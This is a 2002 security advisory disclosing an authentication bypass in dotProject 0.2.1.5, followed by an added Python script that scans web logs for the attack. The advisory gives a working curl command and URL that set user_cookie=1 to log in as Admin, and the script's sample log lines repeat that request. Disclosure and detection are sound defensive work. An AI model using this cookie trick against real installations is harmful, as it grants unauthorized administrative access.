php dotProject bypass authentication

From: pokleyzz (pokleyzz@scan-associates.net)
Date: Sun Jul 28 2002 - 20:19:14 PDT


    SCAN Associates Sdn Bhd Security Advisory
    
    Product: dotProject 0.2.1.5 (possibly others)
    
    Vendor URL: http://www.dotmarketing.org/dotproject/
    
    Summary: php dotProject bypass authentication
    
    Author: pokleyzz <pokleyzz@scan-associates.net>, sk <sk@scan-associates.net>,
    shaharil <shaharil@scan-associates.net>
    
    Description
    ===========
    dotProject is a web-based project management system.
    This application is considered a beta version.
    
    Details
    =======
    Anyone can bypass authentication and log in as Admin.
    It is rather simple to exploit: a user may send a crafted cookie like:
    
    curl -b user_cookie=1 http://server/project/index.php?m=projects
    
    Or simply append user_cookie=1 in any URL:
    
    http://server/project/index.php?m=projects&user_cookie=1
    
    Vendor Response 
    =============== 
    The vendor was contacted on 24/7/2002 but has not replied.
    
    www.scan-associates.net <http://www.scan-associates.net>
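
For defenders reviewing web server logs for the URL form described above, here is an added example (not part of the original advisory) that flags requests whose query string sets `user_cookie`. It assumes Apache combined log format; the log lines are constructed samples, and the cookie form of the request is not visible in access logs unless the Cookie header is logged.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample lines in Apache combined log format (not from the advisory).
SAMPLE_LOG = """\
192.0.2.10 - - [29/Jul/2002:09:14:02 +0000] "GET /project/index.php?m=projects HTTP/1.0" 200 5120 "-" "Mozilla/4.0"
192.0.2.44 - - [29/Jul/2002:09:15:40 +0000] "GET /project/index.php?m=projects&user_cookie=1 HTTP/1.0" 200 9312 "-" "curl/7.9.8"
192.0.2.44 - - [29/Jul/2002:09:16:05 +0000] "GET /project/index.php?m=admin&user%5Fcookie=1 HTTP/1.0" 200 7730 "-" "curl/7.9.8"
198.51.100.7 - - [29/Jul/2002:09:20:11 +0000] "POST /project/index.php?m=tasks HTTP/1.0" 200 2048 "-" "Mozilla/4.0"
"""

# client IP, timestamp, request line (method, target), status code
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)


def find_user_cookie_requests(log_text, param="user_cookie"):
    """Return (ip, timestamp, target, status) for requests whose query sets `param`."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        query = urlsplit(m["target"]).query
        # parse_qsl percent-decodes parameter names, so an encoded
        # spelling of the name is matched as well as the plain one.
        names = {name for name, _ in parse_qsl(query, keep_blank_values=True)}
        if param in names:
            hits.append((m["ip"], m["ts"], m["target"], int(m["status"])))
    return hits


if __name__ == "__main__":
    for ip, ts, target, status in find_user_cookie_requests(SAMPLE_LOG):
        print(f"{ts} {ip} {status} {target}")
```

A legitimate browser session carries `user_cookie` in the Cookie header, not the query string, so any hit from this check deserves review.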
    


